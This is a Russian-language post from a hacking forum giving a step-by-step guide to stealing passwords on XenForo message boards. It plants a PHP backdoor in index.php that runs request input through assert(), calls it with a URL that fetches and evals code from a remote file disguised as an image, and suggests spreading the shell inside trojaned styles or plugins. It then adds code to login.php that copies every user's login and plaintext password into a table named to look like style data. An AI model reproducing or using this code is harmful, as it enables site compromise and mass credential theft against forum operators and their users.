Угоняем пароли юзеров xenforo-бордов

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
В общем первый шаг-внедрение шелла, ложиться на ваши плечи. Можно тупо засунуть шелл в какой-нибудь стиль, плагин, выложить на тематическом форуме и ждать.

Отправляемся к файлу index.php , и дописываем вредоносный код:

Код:
if (isset($_REQUEST['l']))
assert(stripslashes($_REQUEST[l]));
Вызываем скрипт и получаем доступ к RemoteShell:

Код:
http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#
Отсеиваем логин и пасс из файлов с ФТП , создаем базу данных

Код:
create table xf_style_property_css (
ID int(20) AUTO_INCREMENT,
CSSName varchar(50) NOT NULL,
CSSValue varchar(50) NOT NULL,
PRIMARY KEY (ID)
);
Находим в файле login.php строки:

TBUUmhA.png

Дописываем код:

Код:
$DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');
        mysql_select_db('Имя БД');
        mysql_query("SET NAMES 'utf8'");
        $datalogxf = $data['login'];
        $datapassxf = $data['password'];
        mysql_query("INSERT INTO `xf_style_property_css` (`ID`, `CSSName`, `CSSValue`) VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);
После всех выше описанных функций , каждый авторизованный пользователь будет внесен в наш раздел с базой ( который создали выше ).

Выполняем команду получения списка: (Сейчас он пустой )

Код:
SELECT * FROM `xf_style_property_css`
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя